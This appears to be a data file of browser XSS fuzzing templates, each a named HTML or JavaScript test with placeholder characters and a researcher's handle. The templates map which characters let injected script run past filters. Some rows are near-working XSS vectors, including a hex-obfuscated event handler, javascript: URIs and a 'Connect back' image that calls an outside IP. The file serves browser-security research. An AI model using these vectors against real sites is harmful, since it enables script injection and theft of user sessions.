fuzzer set2	<article onerror=log(num) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>datacsspropertynames</td></tr> <tr><td>datadhtmlprops</td><td>datadhtmlprops</td></tr> <tr><td>dataentities</td><td>dataentities</td></tr> <tr><td>dataevents</td><td>dataevents</td></tr> <tr><td>dataevil</td><td>dataevil</td></tr> <tr><td>datahtmlattributes</td><td>datahtmlattributes</td></tr> <tr><td>datahtmlelements</td><td>datahtmlelements</td></tr> <tr><td>datahtmlelements2</td><td>datahtmlelements2</td></tr> <tr><td>dataints</td><td>dataints</td></tr> <tr><td>datajscsspropertynames</td><td>datajscsspropertynames</td></tr> <tr><td>datajsproperties</td><td>datajsproperties</td></tr> <tr><td>datajstest</td><td>datajstest</td></tr> <tr><td>datajstest2</td><td>datajstest2</td></tr> <tr><td>datajstest3</td><td>datajstest3</td></tr> <tr><td>datajstest4</td><td>datajstest4</td></tr> <tr><td>datajstest5</td><td>datajstest5</td></tr> <tr><td>datamyevents</td><td>datamyevents</td></tr> <tr><td>dataprotocols</td><td>dataprotocols</td></tr> <tr><td>dataShortHtmlAttributes</td><td>dataShortHtmlAttributes</td></tr> <tr><td>dataShortHtmlElements</td><td>dataShortHtmlElements</td></tr> <tr><td>datasvgelements</td><td>datasvgelements</td></tr> </table> </article>	@kinmenhacker
html5 article	<article onerror=log(num) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>datacsspropertynames</td></tr> <tr><td>datadhtmlprops</td><td>datadhtmlprops</td></tr> <tr><td>dataentities</td><td>dataentities</td></tr> <tr><td>dataevents</td><td>dataevents</td></tr> <tr><td>dataevil</td><td>dataevil</td></tr> <tr><td>datahtmlattributes</td><td>datahtmlattributes</td></tr> <tr><td>datahtmlelements</td><td>datahtmlelements</td></tr> <tr><td>datahtmlelements2</td><td>datahtmlelements2</td></tr> <tr><td>dataints</td><td>dataints</td></tr> <tr><td>datajscsspropertynames</td><td>datajscsspropertynames</td></tr> <tr><td>datajsproperties</td><td>datajsproperties</td></tr> <tr><td>datajstest</td><td>datajstest</td></tr> <tr><td>datajstest2</td><td>datajstest2</td></tr> <tr><td>datajstest3</td><td>datajstest3</td></tr> <tr><td>datajstest4</td><td>datajstest4</td></tr> <tr><td>datajstest5</td><td>datajstest5</td></tr> <tr><td>datamyevents</td><td>datamyevents</td></tr> <tr><td>dataprotocols</td><td>dataprotocols</td></tr> <tr><td>dataShortHtmlAttributes</td><td>dataShortHtmlAttributes</td></tr> <tr><td>dataShortHtmlElements</td><td>dataShortHtmlElements</td></tr> <tr><td>datasvgelements</td><td>datasvgelements</td></tr> </table> </article>	@kinmenhacker
Connect back	<img src="http://140.134.25.107/?chr=chr&num=num" onerror=logChr(num)>	@kinmenhacker
Separators	<svgchronload=logChr(num)>	@JohnathanKuskos
digits	<script>/^\d$/.test('chr')&&logChr(num);</script>	@garethheyes
new lines	<script> if(/\s/.test('uni')&&!/./.test('uni'))logChr(num) </script>	@garethheyes
spaces	<script> if(/\s/.test('chr'))logChr(num) </script>	@garethheyes
Characters to break VBScript comments	<script language="vbscript"> 'chrlog(num)' </script>	@0x6D6172696F
Characters preceding function call inside throw block	<body onload=throw[onerror=a=chrlogChr(num),a]>	@JohnathanKuskos
chr before alert(1)	<input onfocus=chr:alert(1) autofocus>	@Mramydnei
charecter between two URI	<a href="http://chrjavascript:alert(1)">testxss</a>	@Mramydnei
characters that behave like equal signs in attribute value	<img src== onerror="achrlogChr(num)">	@JohnathanKuskos
test for progress	<progress value="num" max="num"></progress>	@kinmenhacker
test for tag name	<chr width="numpx">datajstest4datajstest4datajstest4dataShortHtmlAttributesdataShortHtmlAttributesdataShortHtmlAttributesdatajstest4	@kinmenhacker
Characters that dont inhibit eventhandlers	<img src=xx:xx ochrnerror=logChr(num)>	@tifkin_
im fish	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@Mramydnei
wwwemogiccom	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>numdatajstest4datacsspropertynamesdatacsspropertynames	@vpelss
Characters that make a double quote valid	<script> chr"; logChr(num); </script>	@tifkin_
Characters allowed after domain	<a href="http://google.comchrbreakme" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters allowed before http	<a href="http://chrgoogle.com" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters that will be mutated to a correct URI 5	<ifrchrame id="lolnum" src="http://shazzer.co.uk" onload=logChr(num);> <i>:)</i> </iframe>	@avlidienbrunn
Characters that will be mutated to a correct URI 4	<script> function reportnum(num){ var lol = document.getElementById('lolnum'); if(/http:\/\/shazzer/.test(lol.src)){ logChr(num); } } </script> <iframe id="lolnum" src="http://chrshazzer.co.uk" onload=reportnum(num)> <p>The browser does not support iframes.</p> </iframe>	@avlidienbrunn
XSS Vector Command Tag	<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>datajscsspropertynames	@rafaybaloch
Characters that will be mutated to a correct URI 3	<script> function reportnum(num){ var lol = document.getElementById('lolnum'); if(/uk\//.test(lol.src)){ logChr(num); } } </script> <iframe id="lolnum" src="http://shazzer.co.ukchrbreak" onload=reportnum(num)> <p>The browser does not support iframes.</p> </iframe>	@avlidienbrunn
Characters that can be used close tags	<script>logChr(num)<chrscript>	@tifkin_
Characters allowed to hex encodings of javascript variables	<script> lo\uchr0067Chr(num); </script>	@tifkin_
Characters allowed to hex encode javascript	<script> lo\chr0067Chr(num); </script>	@tifkin_
Characters allowed in between dashes to end html comments	<!-- -chr-> <script>logChr(num)</script> -->	@JohnathanKuskos
Characters allowed between JS function names and parentheses	<script> logChrchr(num); </script>	@tifkin_
Protocols before Javascript to run code by using Flash navigateURL	<script> setTimeout("if(document.getElementById('myframedataprotocols').contentWindow.document.location.hash.substring(1)) customLog('dataprotocols');",1000) </script> <iframe id="myframedataprotocols" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=dataprotocolsjavascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe>	@irsdl
Characters allowed before script tag name	<chrscript> logChr(num) </script>	@tifkin_
chars allowed between js comment v2	<script>logChr(num)chr'</script>	@insertScript
chars allowed between js comment	<script>logChr(num)/chr/'</script>	@insertScript
allowed char in js comment	<script>logChr(num)<chr!-- '</script>	@insertScript
Characters that result in multiline strings	<script> var a = "chr "; logChr(num); </script>	@tifkin_
Charactes that complete single quote	<script> var a=chr'; logChr(num); </script>	@tifkin_
Characters allowed between property accessor and property	<script> if(document.chrbody === document.body) { logChr(num); } </script>	@tifkin_
Characters that escape escapes	<script> var x = "chr\"; logChr(num); </script>	@JohnathanKuskos
Characters that break out of quoted attributes2	<img src="1chr onerror="logChr(num)">	@tifkin_
img onload with only one char in src	<img src=chr onload=logChr(num)>	@insertScript
Characters allowed between 2 consecutive functions	<script> function a() {} </script> <img src=1 onerror="a()chrlogChr(num)">	@tifkin_
Characters allowed before single functions in event handlers	<img src=1 onerror="chrlogChr(num)">	@tifkin_
Characters that can set event handlers3	<img src=1 onerrorchr"logChr(num)">	@tifkin_
characters which turn into a comment	<svg><script>lo<chr>gChr(num)</script></svg>	@insertScript
Characters that break attribute names	<img src=# aaachronerror="logChr(num)">	@albinowax
char after lt still valid html	<chra href=x onerror=logChr(num)>	@ethicalhack3r
Characters allowed after string multiline separator	<script> var x = "asdf\chr asdf"; logChr(num); </script>	@tifkin_
Characters allowed between attributes	<imgchrsrc=xx:xxchronerror=logChr(num)>	@tifkin_
lt eating char log	<img src=x chr> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)">	@insertScript
Characters not encoded with encodeURIComponent	<script> chr=String.fromCharCode(num); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(num); } </script>	@garethheyes
Characters not encoded with encodeURI	<script> chr=String.fromCharCode(num); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(num); } </script>	@garethheyes
lt eating char v2	<img src=x chr> onerror=logChr(num)>	@insertScript
lt eating char	<img src=x chr> onerror=logChr(num)>	@insertScript
Characters after javascript uri	<a href="javascriptchr:alert(1)" id="fuzzelementnum">test</a>	@insertScript
characters allowd in html entities	<a href="javascript&cochrlon;alert(1)" id="fuzzelementnum">test</a>	@insertScript
Characters before javascript uri	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>	@insertScript
Easter challenge min sequence 2	<script> str=datajstest+datajstest2+datajstest3+datajstest4+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script>	@garethheyes
Easter challenge min sequence	<script> str=datajstest+datajstest2+datajstest3+datajstest4+datajstest5+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script>	@garethheyes
SVG script	<svg><scriptchr>logChr(num)</script></svg>	@garethheyes
Entities allowed with no semi colon	htmlStr = '<div title="'+dataentities.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(dataentities); } }catch(e){};	@garethheyes
HTML Entity in between and	<img src=xx:xx onerror="&chr#X61;lert(num);logChr(num)">	@MisterJyu
JS Property check middle character	<img src=xx:xx onerror=window[['logchrChr']](num)>	@garethheyes
JS Property check ending character	<img src=xx:xx onerror=window[['logChrchr']](num)>	@garethheyes
Characters allowed before slashes no protocol	<a href="chr//google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside slashes no protocol	<a href="/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash 2	<a href="http:chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash	<a href="http:chrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed after slash	<a href="http:/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside http	<a href="htchrtp://google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed within an attribute name (on()load)	"'><img src="xx:xx" onchrerror="log(num);">	@skeptic_fx
Characters transformed in expando attributes	<div id="fuzzelementnum" expandochr="123">test</div>	@garethheyes
Expandos attributes characters removed	<div id="fuzzelementnum" expandochr=123>test</div>	@garethheyes
Valid chars before img word in img tag	<!-- sample vector --> <chrimg src=xx:xx onerror=logChr(num)>	@ontrif
Equals equivalent signs in attributes	<!-- sample vector --> <img src=xx:xx onerrorchrlogChr(num)>	@WisecWisec
meta refresh tag content attribute url overwrite	<!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?chr;URL=javascript:logChr(num)//">	@olemoudi
is my browser leaking location	<iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe>	@garethheyes
Characters between time and URL in meta redirects	<meta http-equiv=refresh content="0chrjavascript:logChr('num')">	@avlidienbrunn
Characters allowed inside jsurl	<a href="javachrscript:alert(1)" id="fuzzelementnum">test</a>	@avlidienbrunn
justatest2	<!-- sample vector --> <imgchrsrc=xx:xx onerror=logChr(num)>	@evilcos
Characters allowed instead of forward slash in url	<a href="chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of colon in js url	<a href="javascriptchralert(1)" id="fuzzelementnum">test</a>	@garethheyes
Cookie fuzzing	<script> document.cookie='chr'; if(document.cookie !== 'chr') { logChr(num,document.cookie); } </script>	@garethheyes
Tags that have the onload event	<datahtmlelements onload="customLog('datahtmlelements')">test</datahtmlelements>	@garethheyes
chars allowed after colon v2	htmlStr = '<a href="javascript&colon'+chr+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(num); } }catch(e){};	@heyheyheyhey10
chars allowed in colon v2	htmlStr = '<a href="javascript&col'+chr+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(num); } }catch(e){};	@heyheyheyhey10
chars allowed after colon	htmlStr = '<a href="javascript&colon'+chr+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(chr); } }catch(e){};	@heyheyheyhey10
Characters consuming spaces between lt and tag name	<chr script>logChr(num)</script>	@blubbfiction
Characters allowed as vbscript variables	<img src=x:xx onerror="try {execScript('chr=1','vbs');log(num);}catch(e){}">	@garethheyes
possible chars in base64 encoding	<svg><script xlink:href=YWxlchrcnQoMSk= ></script>	@heyheyheyhey10
Replacement for s in script tag	<chrcript>logChr(num)</script>	@blubbfiction
Replacement for lt in tag	chrscript>logChr(num)</script>	@blubbfiction
Characters inside script tag name	<scrchript>logChr(num)</script>	@blubbfiction
Characters between lt and tag name	<chrscript>logChr(num)</script>	@blubbfiction
char for fireing onload event	<img src=chr onload=logChr(num)>	@heyheyheyhey10
aaaaa	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@goroasd
html dataentities before event handler	<img src="x" asdf/="_=" alt=" dataentitiesonerror=logChr(num) //">	@testacc40590139
Entities allowed instead of colon for js protocol	htmlStr = '<a href="javascript'+dataentities+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@peksa
Entities allowed after js protocol	htmlStr = '<a href="javascript'+dataentities+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@garethheyes
Entities allowed before js protocol	htmlStr = '<a href="'+dataentities+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@garethheyes
Entities allowed inside js protocol	htmlStr = '<a href="java'+dataentities+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@garethheyes
Entities allowed before CSS rule	htmlStr = '<div style="'+dataentities+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(dataentities); }	@garethheyes
img srcX onerroralert(1)	<div style="color:red'{}chr x:expression(logChr(num))chr">.</div>	@qbye
Break out of HTML element from single quoted attribute	<img src='xx:xchr><img src=xx:x onerror=logChr(num)>'>	@peksa
Escaped characters that break out of single quote HTML attribute	<img src='xx:x\chr onerror="logChr(num)">'>	@peksa
Characters that escape single quoted HTML attributes	<img src='xx:xchr onerror="logChr(num)">'>	@peksa
Marios challenge	<datahtmlelements value="1" datadhtmlprops="test" dataevents="test" datahtmlattributes="test">1</datahtmlelements><script>if(test == "1") parent.customLog('<datahtmlelements value="1" datadhtmlprops="test" dataevents="test" datahtmlattributes="test">1</datahtmlelements>');</script>	@0xAli
Characters syntactically equivalent to double quote in HTML attributes	`"'><img src="#chr onerror=log(num)>	@p_laguna
Eating backslash	<img src=xx:xx onerror="x='chr\',logChr(num)//'">	@garethheyes
Character allowed after the slash for end script tag	<script>alert(logChr(num))</chrscript>	@MisterJyu
Character allowed before the slash for end script tag	<script>alert(logChr(num))<chr/script>	@MisterJyu
Characters that break out of script variables	<script>x='<chrscript><img src=xx:xx onerror=logChr(num)>';</script>	@garethheyes
Char that allows you to act as a slash in closing tag 2	<script>log(num)<chrscript></script>	@notxssninja
Characters that close a HTML comment 3	--><!-- -chr-> <img src=xxx:x onerror=log(num)> -->	@DOMXss
Characters that are spaces	<img src=xx:xx onerror="num<=0xffff&&/./.test('uni')&&/\s/.test('uni')&&logChr(num)">	@garethheyes
Characters that are new lines	<img src=xx:xx onerror="!/./.test('uni')&&/\s/.test('uni')&&logChr(num)">	@garethheyes
Attribute separators	<imgchrsrc=xx:xxchronerror=logChr(num)>	@garethheyes
Characters separating attributes without quotes after hash	<img src=xx:xx#chr/onerror=logChr(num)>	@garethheyes
Characters separating attributes without quotes	<img src=xx:xx alt=`chr/onerror=logChr(num)//`>	@garethheyes
JS in img src for selfxss	<img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpegchrjavascript:alert(chr)">	@ethicalhack3r
Char after lt	<chrscript>alert(num)</script>	@ethicalhack3r
Determine what character can be at the end of the javascript but before the colon	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)> <a href=javascriptchr:alert(num)>num</a>	@MisterJyu
incorrect innerHTML serialization	<datahtmlelements><</datahtmlelements> <datahtmlelements/><</datahtmlelements>	@garethheyes
Characters allowed as slash in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chrsomehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed as gt in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chrsomehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed as lt in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chrsomehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed as _ in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chrsomehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed as s in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chromehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed as h in http	<script> !function(){ var a = document.createElement('a'); a.href='\chrttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed after colon in url (no slashes)	<script> !function(){ var a = document.createElement('a'); a.href='http:\chrsomehost.com'; if(a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed after slash in url	<script> !function(){ var a = document.createElement('a'); a.href='http://\chrsomehost.com'; if(a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed after colon in url	<script> !function(){ var a = document.createElement('a'); a.href='http:\chr//somehost.com'; if(a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters allowed between slashes	<script> !function(){ var a = document.createElement('a'); a.href='/\chr/somehost.com'; if(a.host === 'somehost.com') { logChr(num); } }() </script>	@garethheyes
Characters to end script tag via JavaScript regex 002	<script>log(num,1</scriptchr//)</script>	@0x6D6172696F
Characters to end script tag via JavaScript regex 001	<script>log(num,1</scriptchr/)</script>	@0x6D6172696F
foobar	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>datadhtmlpropsdatadhtmlpropsdatadhtmlpropsdatadhtmlpropshex6uni	@Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket	<body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> urlenc	@secalert
Hex characters allowed after asterix in CSS comments	<div id="fuzzelementnum" style="/*\hex2*/;color:#000000;"></div>	@garethheyes
Characters allowed after asterix in CSS comments	<div id="fuzzelementnum" style="/**chr/;color:#000000;"></div>	@garethheyes
Iframe contentDocument properties	<iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script>	@garethheyes
Iframe contentWindow properties	<iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script>	@garethheyes
Document body variables	<script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Document variables	<script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script>	@garethheyes
Function variables	<script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Object variables	<script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Number variables	<script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
String variables	<script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Regexp variables	<script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Array variables	<script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
Window variables	<script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script>	@garethheyes
aaaaaaaa	<b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>	@PunchyStickMeh
prime browser	<b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>	@thetestmanager
Alternatives to in attributes	<img src=# onerrorchr"log(num)" >	@albinowax
Break out of title	<title>hellochr<chrraw1><script>alert(num)</script></title>	@0xAli
Characters between rgb	<div id="fuzzelementnum" style="color:rchrgb(0,0,0);"></div>	@garethheyes
Characters before rgb	<div id="fuzzelementnum" style="color:chrrgb(0,0,0);"></div>	@garethheyes
Characters allowed before paren	<div id="fuzzelementnum" style="color:rgbchr(0,0,0);"></div>	@garethheyes
Characters allowed after paren rule	<div id="fuzzelementnum" style="color:rgb(0,0,0)chrjunk;"></div>	@garethheyes
Valid characters after expression 4	<div style="xss:expression(logChr(num))\hex2 junk"></div>	@garethheyes
Valid characters after expression 3	<div style="xss:expression(logChr(num))'chrjunk"></div>	@garethheyes
Valid characters after expression 2	<div style="xss:expression(logChr(num))chrchrjunk"></div>	@garethheyes
Valid characters after expression	<div style="xss:expression(logChr(num))chrjunk"></div>	@garethheyes
Opening paren expression check	<div style="xss:expression(logChrchrnum))">test</div>	@garethheyes
Characters that trigger a new attr after new line	<img src=1 title= x:xxchr/onerror=logChr(num)>	@garethheyes
Characters eating backslash in javascript string 2	<script>if("x\chr".length==2) { log(num);}</script>	@mhswende
Characters eating backslash in javascript string	<script>if("x\chr".length==1) { log(num);}</script>	@mhswende
Quoteless attributes breaker	<img src=xxx:xxx title=1chr/onerror=logChr(num)>	@garethheyes
Characters ignored inside javascript string v2	<script>if("xchrx" == "xx") { log(num);}</script>	@mhswende
Characters ignored in html event handler name	<img src=x onchrError="javascript:log(num)"/>	@mhswende
Characters ignored in Javascript function call	"`'><script>lochrg(num)</script>	@mhswende
Replacement for greater than sign	chrscript>log(num)</script>	@mhswende
Characters allowed between tag and attribute	<scriptchrtype="text/javascript">log(num);</script>	@0xAli
Characters which break attributes without quotes	<b id="idnum" x=beginchrend >`'"></b><script>if (!/begin.end/.test(document.getElementById('idnum').getAttribute('x'))) { log(num);}</script>	@shafigullin
Single quote break	<script charset='chr>log(num)</script>	@0xAli
Characters that close a quote	<script charset="chr>log(num)</script>	@0xAli
Uncode sequences generating illegitimate ASCII	<script> "\ud83d\uhex4".match(/.<./) ? log(num) : null; </script>	@0x6D6172696F
Characters allowed after ampersand in named character references	<a href="javascript&chrcolon;log(num)" id="fuzzelementnum">test</a>	@_cweb
Characters ending HTML closing tags (HTML4)	<style></stylechr<img src="about:blank" onerror=log(num)//></style>	@0x6D6172696F
Characters consuming backslashes and breaking JS strings	<script>a='abc\chr\';log(num)//def';</script>	@0x6D6172696F
Events in tags with src or href that execute javascript	<datahtmlelements data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank dataevents="customLog('datahtmlelements dataevents')"></datahtmlelements>	@garethheyes
Tags and events that execute javascript 2	<datahtmlelements dataevents="javascript:parent.customLog('datahtmlelements dataevents')"></datahtmlelements>	@garethheyes
Tags and events that execute javascript	<datahtmlelements datahtmlattributes="javascript:parent.customLog('datahtmlelements datahtmlattributes')"></datahtmlelements>	@garethheyes
Tags that execute onerror	<datahtmlelements src=1 href=1 onerror="customLog('datahtmlelements')"></datahtmlelements>	@garethheyes
Does this browser support e4x	<script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script>	@garethheyes
Characters to separate class names in class attributes	<div class="foonumchrbar">HELLO</div> <script>document.getElementsByClassName('foonum')[0]?log(num):0</script>	@0x6D6172696F
Characters allowed after uri host	"`'/><img/onload=log(num) src="http://shazzer.co.ukchr/favicon.ico"/>	@jackmasa
Determine what character can replace in end tags	<script>log(num)<chrscript>	@MisterJyu
Characters that close a HTML comment 002	<!--chr<img src=xxx:x onerror=log(num)> -->	@0x6D6172696F
Characters that close HTML tags	<script>log(num)</scriptchr	@0x6D6172696F
Characters not encoded by encodeURIComponent	<script> if ('uni' === encodeURIComponent('uni')) { log(num); } </script>	@shafigullin
Characters not encoded by encodeURI	<script> if ('uni' === encodeURI('uni')) { log(num); } </script>	@shafigullin
Characters allowed after script	<scriptchr>log(num)</script>	@garethheyes
Single character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrstyle=color:#FF1133;" id="copyTargetnum">num - test</div> </div>	@thewildcat
Entity character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="&#xhex6;style=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat
determine what characters can be inside a script tag	"`'><scchrript>log(num)</scchrript>	@MisterJyu
Characters allowed attribute quote	"/><img/onerror=chrlog(num)chrsrc=xxx:x />	@jackmasa
determine any chars can go between the onerror attributes	<img src="x"chrchrochrnchrerror="alert(num)">	@MisterJyu
Replacement for greater and less than signs (revised)	chrscriptchr log(num) chrchrscript*chr	@MisterJyu
Replacement for greater and less than signs	chrscriptchr alert(1) chr*chrscript*chr	@MisterJyu
Characters syntactically equivalent to single quote in HTML attributes	`"'><img src='#chr onerror=log(num)>	@_cweb
Characters syntactically equivalent to colon in a URI	<a href="javascriptchralert(1)" id="fuzzelementnum">test</a>	@_cweb
Characters breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrchrstyle=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat
Characters escaping JS comment delimiters 001	<script>/* *chr/log(num)// */</script>	@0x6D6172696F
Characters breaking CSS strings allowing expression	"'`>ABC<div style="font-family:'foochr;x:expression(log(num));/*';">DEF	@0x6D6172696F
Characters ending CSS values allowing expressions	"'`>ABC<div style="font-family:'foo'chrx:expression(log(num));/*';">DEF	@0x6D6172696F
Characters breaking JavaScript Regex delimiter	"'`><script>a=/hello;chr;i=0;log(num);a/i;</script>	@0x6D6172696F
Escape from attribute a closing tag	<a href="chr><script>log(num)</script>" />	@shafigullin
Characters in script inside XML elements 004	"'`><p><svg><script>a='hellochr;log(num)//';</script></p>	@0x6D6172696F
Characters in script inside XML elements 003	<p><svg><script>chrog(num)</script></p>	@0x6D6172696F
Characters in script inside XML elements 002	<p><svg><script>lchrog(num)</script></p>	@0x6D6172696F
Characters in script inside XML elements 001	<p><svg><script>chrlog(num)</script></p>	@0x6D6172696F
Space characters in RegExp	<script> if ('chr'.replace(/\s/g, '') === '') { log(num); } </script>	@shafigullin
Character between lt and slash in closing tag	<script>log(num)<chr/script>	@shafigullin
Characters allowed for padding in a VBS URI 002	<iframe src="vbscript:logchrnum"></iframe>	@0x6D6172696F
Characters allowed for padding in a VBS URI 001	<iframe src="vbs:logchrnum"></iframe>	@0x6D6172696F
Characters allowed between CSS expression chars 02	ABC<div style="x:expressionchr(log(num))">DEF	@0x6D6172696F
Characters allowed between CSS expression chars 01	ABC<div style="x:expchrression(log(num))">DEF	@0x6D6172696F
Characters allowed between CSS colon and expression	ABC<div style="x:chrexpression(log(num))">DEF	@0x6D6172696F
Characters allowed between CSS prop and expression	ABC<div style="xchrexpression(log(num))">DEF	@0x6D6172696F
Characters allowed for padding in a data URI 003	<script src="data:text/plainchrlog(num)"></script>	@0x6D6172696F
Characters allowed for padding in a data URI 002	<script src="data:chr,log(num)"></script>	@0x6D6172696F
Characters allowed for padding in a data URI 001	<script src="data:text/plain,lochrg(num)"></script>	@0x6D6172696F
Characters trimmed my trim	<script> if ('chr'.trim() === '') { log(num); } </script>	@shafigullin
Characters before paren in Javascript call	"'`><script>logchr(num)</script>	@garethheyes
